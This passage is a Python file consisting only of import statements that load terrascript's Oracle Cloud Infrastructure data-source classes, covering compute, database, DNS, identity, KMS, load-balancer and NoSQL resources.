from terrascript.data.hashicorp.oci import oci_core_cluster_networks
from terrascript.data.hashicorp.oci import oci_core_compute_capacity_reservation
from terrascript.data.hashicorp.oci import (
oci_core_compute_capacity_reservation_instance_shapes,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_capacity_reservation_instances,
)
from terrascript.data.hashicorp.oci import oci_core_compute_capacity_reservations
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schema,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schemas,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schemas_version,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schemas_versions,
)
from terrascript.data.hashicorp.oci import oci_core_compute_image_capability_schema
from terrascript.data.hashicorp.oci import oci_core_compute_image_capability_schemas
from terrascript.data.hashicorp.oci import oci_core_console_histories
from terrascript.data.hashicorp.oci import oci_core_console_history_data
from terrascript.data.hashicorp.oci import oci_core_cpe_device_shape
from terrascript.data.hashicorp.oci import oci_core_cpe_device_shapes
from terrascript.data.hashicorp.oci import oci_core_cpes
from terrascript.data.hashicorp.oci import oci_core_cross_connect
from terrascript.data.hashicorp.oci import oci_core_cross_connect_group
from terrascript.data.hashicorp.oci import oci_core_cross_connect_groups
from terrascript.data.hashicorp.oci import oci_core_cross_connect_locations
from terrascript.data.hashicorp.oci import oci_core_cross_connect_port_speed_shapes
from terrascript.data.hashicorp.oci import oci_core_cross_connect_status
from terrascript.data.hashicorp.oci import oci_core_cross_connects
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_host
from terrascript.data.hashicorp.oci import (
oci_core_dedicated_vm_host_instance_shapes,
)
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_host_shapes
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_hosts
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_hosts_instances
from terrascript.data.hashicorp.oci import oci_core_dhcp_options
from terrascript.data.hashicorp.oci import oci_core_drg_attachments
from terrascript.data.hashicorp.oci import oci_core_drg_route_distribution
from terrascript.data.hashicorp.oci import (
oci_core_drg_route_distribution_statements,
)
from terrascript.data.hashicorp.oci import oci_core_drg_route_distributions
from terrascript.data.hashicorp.oci import oci_core_drg_route_table
from terrascript.data.hashicorp.oci import oci_core_drg_route_table_route_rules
from terrascript.data.hashicorp.oci import oci_core_drg_route_tables
from terrascript.data.hashicorp.oci import oci_core_drgs
from terrascript.data.hashicorp.oci import oci_core_fast_connect_provider_service
from terrascript.data.hashicorp.oci import (
oci_core_fast_connect_provider_service_key,
)
from terrascript.data.hashicorp.oci import oci_core_fast_connect_provider_services
from terrascript.data.hashicorp.oci import oci_core_image
from terrascript.data.hashicorp.oci import oci_core_image_shape
from terrascript.data.hashicorp.oci import oci_core_image_shapes
from terrascript.data.hashicorp.oci import oci_core_images
from terrascript.data.hashicorp.oci import oci_core_instance
from terrascript.data.hashicorp.oci import oci_core_instance_configuration
from terrascript.data.hashicorp.oci import oci_core_instance_configurations
from terrascript.data.hashicorp.oci import oci_core_instance_console_connections
from terrascript.data.hashicorp.oci import oci_core_instance_credentials
from terrascript.data.hashicorp.oci import oci_core_instance_devices
from terrascript.data.hashicorp.oci import oci_core_instance_measured_boot_report
from terrascript.data.hashicorp.oci import oci_core_instance_pool
from terrascript.data.hashicorp.oci import oci_core_instance_pool_instances
from terrascript.data.hashicorp.oci import (
oci_core_instance_pool_load_balancer_attachment,
)
from terrascript.data.hashicorp.oci import oci_core_instance_pools
from terrascript.data.hashicorp.oci import oci_core_instances
from terrascript.data.hashicorp.oci import oci_core_internet_gateways
from terrascript.data.hashicorp.oci import oci_core_ipsec_config
from terrascript.data.hashicorp.oci import oci_core_ipsec_connection_tunnel
from terrascript.data.hashicorp.oci import oci_core_ipsec_connection_tunnels
from terrascript.data.hashicorp.oci import oci_core_ipsec_connections
from terrascript.data.hashicorp.oci import oci_core_ipsec_status
from terrascript.data.hashicorp.oci import oci_core_ipv6
from terrascript.data.hashicorp.oci import oci_core_ipv6s
from terrascript.data.hashicorp.oci import oci_core_letter_of_authority
from terrascript.data.hashicorp.oci import oci_core_listing_resource_version
from terrascript.data.hashicorp.oci import oci_core_listing_resource_versions
from terrascript.data.hashicorp.oci import oci_core_local_peering_gateways
from terrascript.data.hashicorp.oci import oci_core_nat_gateway
from terrascript.data.hashicorp.oci import oci_core_nat_gateways
from terrascript.data.hashicorp.oci import oci_core_network_security_group
from terrascript.data.hashicorp.oci import (
oci_core_network_security_group_security_rules,
)
from terrascript.data.hashicorp.oci import oci_core_network_security_group_vnics
from terrascript.data.hashicorp.oci import oci_core_network_security_groups
from terrascript.data.hashicorp.oci import oci_core_peer_region_for_remote_peerings
from terrascript.data.hashicorp.oci import oci_core_private_ip
from terrascript.data.hashicorp.oci import oci_core_private_ips
from terrascript.data.hashicorp.oci import oci_core_public_ip
from terrascript.data.hashicorp.oci import oci_core_public_ip_pool
from terrascript.data.hashicorp.oci import oci_core_public_ip_pools
from terrascript.data.hashicorp.oci import oci_core_public_ips
from terrascript.data.hashicorp.oci import oci_core_remote_peering_connections
from terrascript.data.hashicorp.oci import oci_core_route_tables
from terrascript.data.hashicorp.oci import oci_core_security_lists
from terrascript.data.hashicorp.oci import oci_core_service_gateways
from terrascript.data.hashicorp.oci import oci_core_services
from terrascript.data.hashicorp.oci import oci_core_shape
from terrascript.data.hashicorp.oci import oci_core_shapes
from terrascript.data.hashicorp.oci import oci_core_subnet
from terrascript.data.hashicorp.oci import oci_core_subnets
from terrascript.data.hashicorp.oci import oci_core_vcn
from terrascript.data.hashicorp.oci import oci_core_vcn_dns_resolver_association
from terrascript.data.hashicorp.oci import oci_core_vcns
from terrascript.data.hashicorp.oci import oci_core_virtual_circuit
from terrascript.data.hashicorp.oci import oci_core_virtual_circuit_bandwidth_shapes
from terrascript.data.hashicorp.oci import oci_core_virtual_circuit_public_prefixes
from terrascript.data.hashicorp.oci import oci_core_virtual_circuits
from terrascript.data.hashicorp.oci import oci_core_virtual_networks
from terrascript.data.hashicorp.oci import oci_core_vlan
from terrascript.data.hashicorp.oci import oci_core_vlans
from terrascript.data.hashicorp.oci import oci_core_vnic
from terrascript.data.hashicorp.oci import oci_core_vnic_attachments
from terrascript.data.hashicorp.oci import oci_core_volume
from terrascript.data.hashicorp.oci import oci_core_volume_attachments
from terrascript.data.hashicorp.oci import oci_core_volume_backup_policies
from terrascript.data.hashicorp.oci import oci_core_volume_backup_policy_assignments
from terrascript.data.hashicorp.oci import oci_core_volume_backups
from terrascript.data.hashicorp.oci import oci_core_volume_group_backups
from terrascript.data.hashicorp.oci import oci_core_volume_groups
from terrascript.data.hashicorp.oci import oci_core_volumes
from terrascript.data.hashicorp.oci import oci_data_safe_data_safe_configuration
from terrascript.data.hashicorp.oci import oci_data_safe_data_safe_private_endpoint
from terrascript.data.hashicorp.oci import oci_data_safe_data_safe_private_endpoints
from terrascript.data.hashicorp.oci import oci_data_safe_on_prem_connector
from terrascript.data.hashicorp.oci import oci_data_safe_on_prem_connectors
from terrascript.data.hashicorp.oci import oci_data_safe_target_database
from terrascript.data.hashicorp.oci import oci_data_safe_target_databases
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_database,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_database_dataguard_association,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_database_dataguard_associations,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_databases,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_container_patches
from terrascript.data.hashicorp.oci import oci_database_autonomous_database
from terrascript.data.hashicorp.oci import oci_database_autonomous_database_backup
from terrascript.data.hashicorp.oci import oci_database_autonomous_database_backups
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_dataguard_association,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_dataguard_associations,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_instance_wallet_management,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_regional_wallet_management,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_database_wallet
from terrascript.data.hashicorp.oci import oci_database_autonomous_databases
from terrascript.data.hashicorp.oci import oci_database_autonomous_databases_clones
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_db_preview_versions,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_db_versions
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure_ocpu,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure_shapes,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructures,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_patch
from terrascript.data.hashicorp.oci import oci_database_autonomous_vm_cluster
from terrascript.data.hashicorp.oci import oci_database_autonomous_vm_clusters
from terrascript.data.hashicorp.oci import oci_database_backup_destination
from terrascript.data.hashicorp.oci import oci_database_backup_destinations
from terrascript.data.hashicorp.oci import oci_database_backups
from terrascript.data.hashicorp.oci import oci_database_cloud_exadata_infrastructure
from terrascript.data.hashicorp.oci import (
oci_database_cloud_exadata_infrastructures,
)
from terrascript.data.hashicorp.oci import oci_database_cloud_vm_cluster
from terrascript.data.hashicorp.oci import oci_database_cloud_vm_clusters
from terrascript.data.hashicorp.oci import oci_database_data_guard_association
from terrascript.data.hashicorp.oci import oci_database_data_guard_associations
from terrascript.data.hashicorp.oci import oci_database_database
from terrascript.data.hashicorp.oci import oci_database_database_software_image
from terrascript.data.hashicorp.oci import oci_database_database_software_images
from terrascript.data.hashicorp.oci import (
oci_database_database_upgrade_history_entries,
)
from terrascript.data.hashicorp.oci import (
oci_database_database_upgrade_history_entry,
)
from terrascript.data.hashicorp.oci import oci_database_databases
from terrascript.data.hashicorp.oci import oci_database_db_home
from terrascript.data.hashicorp.oci import (
oci_database_db_home_patch_history_entries,
)
from terrascript.data.hashicorp.oci import oci_database_db_home_patches
from terrascript.data.hashicorp.oci import oci_database_db_homes
from terrascript.data.hashicorp.oci import oci_database_db_node
from terrascript.data.hashicorp.oci import oci_database_db_node_console_connection
from terrascript.data.hashicorp.oci import oci_database_db_node_console_connections
from terrascript.data.hashicorp.oci import oci_database_db_nodes
from terrascript.data.hashicorp.oci import (
oci_database_db_system_patch_history_entries,
)
from terrascript.data.hashicorp.oci import oci_database_db_system_patches
from terrascript.data.hashicorp.oci import oci_database_db_system_shapes
from terrascript.data.hashicorp.oci import oci_database_db_systems
from terrascript.data.hashicorp.oci import oci_database_db_versions
from terrascript.data.hashicorp.oci import oci_database_exadata_infrastructure
from terrascript.data.hashicorp.oci import (
oci_database_exadata_infrastructure_download_config_file,
)
from terrascript.data.hashicorp.oci import oci_database_exadata_infrastructures
from terrascript.data.hashicorp.oci import oci_database_exadata_iorm_config
from terrascript.data.hashicorp.oci import oci_database_external_container_database
from terrascript.data.hashicorp.oci import oci_database_external_container_databases
from terrascript.data.hashicorp.oci import oci_database_external_database_connector
from terrascript.data.hashicorp.oci import oci_database_external_database_connectors
from terrascript.data.hashicorp.oci import (
oci_database_external_non_container_database,
)
from terrascript.data.hashicorp.oci import (
oci_database_external_non_container_databases,
)
from terrascript.data.hashicorp.oci import oci_database_external_pluggable_database
from terrascript.data.hashicorp.oci import oci_database_external_pluggable_databases
from terrascript.data.hashicorp.oci import oci_database_flex_components
from terrascript.data.hashicorp.oci import oci_database_gi_versions
from terrascript.data.hashicorp.oci import oci_database_key_store
from terrascript.data.hashicorp.oci import oci_database_key_stores
from terrascript.data.hashicorp.oci import oci_database_maintenance_run
from terrascript.data.hashicorp.oci import oci_database_maintenance_runs
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoint,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoint_associated_database,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoint_associated_databases,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoints,
)
from terrascript.data.hashicorp.oci import oci_database_management_managed_database
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_database_group,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_database_groups,
)
from terrascript.data.hashicorp.oci import oci_database_management_managed_databases
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_databases_database_parameter,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_databases_database_parameters,
)
from terrascript.data.hashicorp.oci import oci_database_migration_agent
from terrascript.data.hashicorp.oci import oci_database_migration_agent_images
from terrascript.data.hashicorp.oci import oci_database_migration_agents
from terrascript.data.hashicorp.oci import oci_database_migration_connection
from terrascript.data.hashicorp.oci import oci_database_migration_connections
from terrascript.data.hashicorp.oci import oci_database_migration_job
from terrascript.data.hashicorp.oci import oci_database_migration_jobs
from terrascript.data.hashicorp.oci import oci_database_migration_migration
from terrascript.data.hashicorp.oci import oci_database_migration_migrations
from terrascript.data.hashicorp.oci import oci_database_pluggable_database
from terrascript.data.hashicorp.oci import oci_database_pluggable_databases
from terrascript.data.hashicorp.oci import oci_database_vm_cluster
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_network
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_network_download_config_file,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_networks
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_patch
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_patch_history_entries,
)
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_patch_history_entry,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_patches
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_recommended_network,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_update
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_update_history_entries,
)
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_update_history_entry,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_updates
from terrascript.data.hashicorp.oci import oci_database_vm_clusters
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_private_endpoint
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_private_endpoints
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_type
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_types
from terrascript.data.hashicorp.oci import oci_datacatalog_catalogs
from terrascript.data.hashicorp.oci import oci_datacatalog_connection
from terrascript.data.hashicorp.oci import oci_datacatalog_connections
from terrascript.data.hashicorp.oci import oci_datacatalog_data_asset
from terrascript.data.hashicorp.oci import oci_datacatalog_data_assets
from terrascript.data.hashicorp.oci import oci_datacatalog_metastore
from terrascript.data.hashicorp.oci import oci_datacatalog_metastores
from terrascript.data.hashicorp.oci import oci_dataflow_application
from terrascript.data.hashicorp.oci import oci_dataflow_applications
from terrascript.data.hashicorp.oci import oci_dataflow_invoke_run
from terrascript.data.hashicorp.oci import oci_dataflow_invoke_runs
from terrascript.data.hashicorp.oci import oci_dataflow_private_endpoint
from terrascript.data.hashicorp.oci import oci_dataflow_private_endpoints
from terrascript.data.hashicorp.oci import oci_dataflow_run_log
from terrascript.data.hashicorp.oci import oci_dataflow_run_logs
from terrascript.data.hashicorp.oci import oci_dataintegration_workspace
from terrascript.data.hashicorp.oci import oci_dataintegration_workspaces
from terrascript.data.hashicorp.oci import oci_datascience_job
from terrascript.data.hashicorp.oci import oci_datascience_job_run
from terrascript.data.hashicorp.oci import oci_datascience_job_runs
from terrascript.data.hashicorp.oci import oci_datascience_job_shapes
from terrascript.data.hashicorp.oci import oci_datascience_jobs
from terrascript.data.hashicorp.oci import oci_datascience_model
from terrascript.data.hashicorp.oci import oci_datascience_model_deployment
from terrascript.data.hashicorp.oci import oci_datascience_model_deployment_shapes
from terrascript.data.hashicorp.oci import oci_datascience_model_deployments
from terrascript.data.hashicorp.oci import oci_datascience_model_provenance
from terrascript.data.hashicorp.oci import oci_datascience_models
from terrascript.data.hashicorp.oci import oci_datascience_notebook_session
from terrascript.data.hashicorp.oci import oci_datascience_notebook_session_shapes
from terrascript.data.hashicorp.oci import oci_datascience_notebook_sessions
from terrascript.data.hashicorp.oci import oci_datascience_project
from terrascript.data.hashicorp.oci import oci_datascience_projects
from terrascript.data.hashicorp.oci import oci_devops_deploy_artifact
from terrascript.data.hashicorp.oci import oci_devops_deploy_artifacts
from terrascript.data.hashicorp.oci import oci_devops_deploy_environment
from terrascript.data.hashicorp.oci import oci_devops_deploy_environments
from terrascript.data.hashicorp.oci import oci_devops_deploy_pipeline
from terrascript.data.hashicorp.oci import oci_devops_deploy_pipelines
from terrascript.data.hashicorp.oci import oci_devops_deploy_stage
from terrascript.data.hashicorp.oci import oci_devops_deploy_stages
from terrascript.data.hashicorp.oci import oci_devops_deployment
from terrascript.data.hashicorp.oci import oci_devops_deployments
from terrascript.data.hashicorp.oci import oci_devops_project
from terrascript.data.hashicorp.oci import oci_devops_projects
from terrascript.data.hashicorp.oci import oci_dns_records
from terrascript.data.hashicorp.oci import oci_dns_resolver
from terrascript.data.hashicorp.oci import oci_dns_resolver_endpoint
from terrascript.data.hashicorp.oci import oci_dns_resolver_endpoints
from terrascript.data.hashicorp.oci import oci_dns_resolvers
from terrascript.data.hashicorp.oci import oci_dns_rrset
from terrascript.data.hashicorp.oci import oci_dns_steering_policies
from terrascript.data.hashicorp.oci import oci_dns_steering_policy
from terrascript.data.hashicorp.oci import oci_dns_steering_policy_attachment
from terrascript.data.hashicorp.oci import oci_dns_steering_policy_attachments
from terrascript.data.hashicorp.oci import oci_dns_tsig_key
from terrascript.data.hashicorp.oci import oci_dns_tsig_keys
from terrascript.data.hashicorp.oci import oci_dns_view
from terrascript.data.hashicorp.oci import oci_dns_views
from terrascript.data.hashicorp.oci import oci_dns_zones
from terrascript.data.hashicorp.oci import oci_email_dkim
from terrascript.data.hashicorp.oci import oci_email_dkims
from terrascript.data.hashicorp.oci import oci_email_email_domain
from terrascript.data.hashicorp.oci import oci_email_email_domains
from terrascript.data.hashicorp.oci import oci_email_sender
from terrascript.data.hashicorp.oci import oci_email_senders
from terrascript.data.hashicorp.oci import oci_email_suppression
from terrascript.data.hashicorp.oci import oci_email_suppressions
from terrascript.data.hashicorp.oci import oci_events_rule
from terrascript.data.hashicorp.oci import oci_events_rules
from terrascript.data.hashicorp.oci import oci_file_storage_export_sets
from terrascript.data.hashicorp.oci import oci_file_storage_exports
from terrascript.data.hashicorp.oci import oci_file_storage_file_systems
from terrascript.data.hashicorp.oci import oci_file_storage_mount_targets
from terrascript.data.hashicorp.oci import oci_file_storage_snapshot
from terrascript.data.hashicorp.oci import oci_file_storage_snapshots
from terrascript.data.hashicorp.oci import oci_functions_application
from terrascript.data.hashicorp.oci import oci_functions_applications
from terrascript.data.hashicorp.oci import oci_functions_function
from terrascript.data.hashicorp.oci import oci_functions_functions
from terrascript.data.hashicorp.oci import (
oci_generic_artifacts_content_artifact_by_path,
)
from terrascript.data.hashicorp.oci import (
oci_generic_artifacts_content_generic_artifacts_content,
)
from terrascript.data.hashicorp.oci import oci_golden_gate_database_registration
from terrascript.data.hashicorp.oci import oci_golden_gate_database_registrations
from terrascript.data.hashicorp.oci import oci_golden_gate_deployment
from terrascript.data.hashicorp.oci import oci_golden_gate_deployment_backup
from terrascript.data.hashicorp.oci import oci_golden_gate_deployment_backups
from terrascript.data.hashicorp.oci import oci_golden_gate_deployments
from terrascript.data.hashicorp.oci import oci_health_checks_http_monitor
from terrascript.data.hashicorp.oci import oci_health_checks_http_monitors
from terrascript.data.hashicorp.oci import oci_health_checks_http_probe_results
from terrascript.data.hashicorp.oci import oci_health_checks_ping_monitor
from terrascript.data.hashicorp.oci import oci_health_checks_ping_monitors
from terrascript.data.hashicorp.oci import oci_health_checks_ping_probe_results
from terrascript.data.hashicorp.oci import oci_health_checks_vantage_points
from terrascript.data.hashicorp.oci import oci_identity_api_keys
from terrascript.data.hashicorp.oci import oci_identity_auth_tokens
from terrascript.data.hashicorp.oci import oci_identity_authentication_policy
from terrascript.data.hashicorp.oci import oci_identity_availability_domain
from terrascript.data.hashicorp.oci import oci_identity_availability_domains
from terrascript.data.hashicorp.oci import oci_identity_compartment
from terrascript.data.hashicorp.oci import oci_identity_compartments
from terrascript.data.hashicorp.oci import oci_identity_cost_tracking_tags
from terrascript.data.hashicorp.oci import oci_identity_customer_secret_keys
from terrascript.data.hashicorp.oci import oci_identity_dynamic_groups
from terrascript.data.hashicorp.oci import oci_identity_fault_domains
from terrascript.data.hashicorp.oci import oci_identity_group
from terrascript.data.hashicorp.oci import oci_identity_groups
from terrascript.data.hashicorp.oci import oci_identity_identity_provider_groups
from terrascript.data.hashicorp.oci import oci_identity_identity_providers
from terrascript.data.hashicorp.oci import oci_identity_idp_group_mappings
from terrascript.data.hashicorp.oci import oci_identity_network_source
from terrascript.data.hashicorp.oci import oci_identity_network_sources
from terrascript.data.hashicorp.oci import oci_identity_policies
from terrascript.data.hashicorp.oci import oci_identity_region_subscriptions
from terrascript.data.hashicorp.oci import oci_identity_regions
from terrascript.data.hashicorp.oci import oci_identity_smtp_credentials
from terrascript.data.hashicorp.oci import oci_identity_swift_passwords
from terrascript.data.hashicorp.oci import oci_identity_tag
from terrascript.data.hashicorp.oci import oci_identity_tag_default
from terrascript.data.hashicorp.oci import oci_identity_tag_defaults
from terrascript.data.hashicorp.oci import oci_identity_tag_namespaces
from terrascript.data.hashicorp.oci import oci_identity_tags
from terrascript.data.hashicorp.oci import oci_identity_tenancy
from terrascript.data.hashicorp.oci import oci_identity_ui_password
from terrascript.data.hashicorp.oci import oci_identity_user
from terrascript.data.hashicorp.oci import oci_identity_user_group_memberships
from terrascript.data.hashicorp.oci import oci_identity_users
from terrascript.data.hashicorp.oci import oci_integration_integration_instance
from terrascript.data.hashicorp.oci import oci_integration_integration_instances
from terrascript.data.hashicorp.oci import oci_jms_fleet
from terrascript.data.hashicorp.oci import oci_jms_fleets
from terrascript.data.hashicorp.oci import oci_kms_decrypted_data
from terrascript.data.hashicorp.oci import oci_kms_encrypted_data
from terrascript.data.hashicorp.oci import oci_kms_key
from terrascript.data.hashicorp.oci import oci_kms_key_version
from terrascript.data.hashicorp.oci import oci_kms_key_versions
from terrascript.data.hashicorp.oci import oci_kms_keys
from terrascript.data.hashicorp.oci import oci_kms_replication_status
from terrascript.data.hashicorp.oci import oci_kms_vault
from terrascript.data.hashicorp.oci import oci_kms_vault_replicas
from terrascript.data.hashicorp.oci import oci_kms_vault_usage
from terrascript.data.hashicorp.oci import oci_kms_vaults
from terrascript.data.hashicorp.oci import oci_limits_limit_definitions
from terrascript.data.hashicorp.oci import oci_limits_limit_values
from terrascript.data.hashicorp.oci import oci_limits_quota
from terrascript.data.hashicorp.oci import oci_limits_quotas
from terrascript.data.hashicorp.oci import oci_limits_resource_availability
from terrascript.data.hashicorp.oci import oci_limits_services
from terrascript.data.hashicorp.oci import oci_load_balancer_backend_health
from terrascript.data.hashicorp.oci import oci_load_balancer_backend_set_health
from terrascript.data.hashicorp.oci import oci_load_balancer_backend_sets
from terrascript.data.hashicorp.oci import oci_load_balancer_backends
from terrascript.data.hashicorp.oci import oci_load_balancer_backendsets
from terrascript.data.hashicorp.oci import oci_load_balancer_certificates
from terrascript.data.hashicorp.oci import oci_load_balancer_health
from terrascript.data.hashicorp.oci import oci_load_balancer_hostnames
from terrascript.data.hashicorp.oci import oci_load_balancer_listener_rules
from terrascript.data.hashicorp.oci import (
oci_load_balancer_load_balancer_routing_policies,
)
from terrascript.data.hashicorp.oci import (
oci_load_balancer_load_balancer_routing_policy,
)
from terrascript.data.hashicorp.oci import oci_load_balancer_load_balancers
from terrascript.data.hashicorp.oci import oci_load_balancer_path_route_sets
from terrascript.data.hashicorp.oci import oci_load_balancer_policies
from terrascript.data.hashicorp.oci import oci_load_balancer_protocols
from terrascript.data.hashicorp.oci import oci_load_balancer_rule_set
from terrascript.data.hashicorp.oci import oci_load_balancer_rule_sets
from terrascript.data.hashicorp.oci import oci_load_balancer_shapes
from terrascript.data.hashicorp.oci import oci_load_balancer_ssl_cipher_suite
from terrascript.data.hashicorp.oci import oci_load_balancer_ssl_cipher_suites
from terrascript.data.hashicorp.oci import oci_load_balancers
from terrascript.data.hashicorp.oci import oci_log_analytics_log_analytics_entities
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_entities_summary,
)
from terrascript.data.hashicorp.oci import oci_log_analytics_log_analytics_entity
from terrascript.data.hashicorp.oci import oci_log_analytics_log_analytics_log_group
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_log_groups,
)
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_log_groups_summary,
)
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_object_collection_rule,
)
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_object_collection_rules,
)
from terrascript.data.hashicorp.oci import oci_log_analytics_namespace
from terrascript.data.hashicorp.oci import oci_log_analytics_namespaces
from terrascript.data.hashicorp.oci import oci_logging_log
from terrascript.data.hashicorp.oci import oci_logging_log_group
from terrascript.data.hashicorp.oci import oci_logging_log_groups
from terrascript.data.hashicorp.oci import oci_logging_log_saved_search
from terrascript.data.hashicorp.oci import oci_logging_log_saved_searches
from terrascript.data.hashicorp.oci import oci_logging_logs
from terrascript.data.hashicorp.oci import oci_logging_unified_agent_configuration
from terrascript.data.hashicorp.oci import oci_logging_unified_agent_configurations
from terrascript.data.hashicorp.oci import oci_management_agent_management_agent
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_available_histories,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_count,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_images,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_install_key,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_install_keys,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_plugin_count,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_plugins,
)
from terrascript.data.hashicorp.oci import oci_management_agent_management_agents
from terrascript.data.hashicorp.oci import (
oci_management_dashboard_management_dashboards_export,
)
from terrascript.data.hashicorp.oci import oci_marketplace_accepted_agreement
from terrascript.data.hashicorp.oci import oci_marketplace_accepted_agreements
from terrascript.data.hashicorp.oci import oci_marketplace_categories
from terrascript.data.hashicorp.oci import oci_marketplace_listing
from terrascript.data.hashicorp.oci import oci_marketplace_listing_package
from terrascript.data.hashicorp.oci import (
oci_marketplace_listing_package_agreements,
)
from terrascript.data.hashicorp.oci import oci_marketplace_listing_packages
from terrascript.data.hashicorp.oci import oci_marketplace_listing_taxes
from terrascript.data.hashicorp.oci import oci_marketplace_listings
from terrascript.data.hashicorp.oci import oci_marketplace_publication
from terrascript.data.hashicorp.oci import oci_marketplace_publication_package
from terrascript.data.hashicorp.oci import oci_marketplace_publication_packages
from terrascript.data.hashicorp.oci import oci_marketplace_publications
from terrascript.data.hashicorp.oci import oci_marketplace_publishers
from terrascript.data.hashicorp.oci import oci_metering_computation_configuration
from terrascript.data.hashicorp.oci import oci_metering_computation_custom_table
from terrascript.data.hashicorp.oci import oci_metering_computation_custom_tables
from terrascript.data.hashicorp.oci import oci_metering_computation_queries
from terrascript.data.hashicorp.oci import oci_metering_computation_query
from terrascript.data.hashicorp.oci import oci_monitoring_alarm
from terrascript.data.hashicorp.oci import oci_monitoring_alarm_history_collection
from terrascript.data.hashicorp.oci import oci_monitoring_alarm_statuses
from terrascript.data.hashicorp.oci import oci_monitoring_alarms
from terrascript.data.hashicorp.oci import oci_monitoring_metric_data
from terrascript.data.hashicorp.oci import oci_monitoring_metrics
from terrascript.data.hashicorp.oci import oci_mysql_analytics_cluster
from terrascript.data.hashicorp.oci import oci_mysql_channel
from terrascript.data.hashicorp.oci import oci_mysql_channels
from terrascript.data.hashicorp.oci import oci_mysql_heat_wave_cluster
from terrascript.data.hashicorp.oci import oci_mysql_mysql_backup
from terrascript.data.hashicorp.oci import oci_mysql_mysql_backups
from terrascript.data.hashicorp.oci import oci_mysql_mysql_configuration
from terrascript.data.hashicorp.oci import oci_mysql_mysql_configurations
from terrascript.data.hashicorp.oci import oci_mysql_mysql_db_system
from terrascript.data.hashicorp.oci import oci_mysql_mysql_db_systems
from terrascript.data.hashicorp.oci import oci_mysql_mysql_versions
from terrascript.data.hashicorp.oci import oci_mysql_shapes
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backend_health
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backend_set
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_backend_set_health,
)
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backend_sets
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backends
from terrascript.data.hashicorp.oci import oci_network_load_balancer_listener
from terrascript.data.hashicorp.oci import oci_network_load_balancer_listeners
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancer,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancer_health,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancers,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancers_policies,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancers_protocols,
)
from terrascript.data.hashicorp.oci import oci_nosql_index
from terrascript.data.hashicorp.oci import oci_nosql_indexes
from terrascript.data.hashicorp.oci import oci_nosql_table
from terrascript.data.hashicorp.oci import oci_nosql_tables
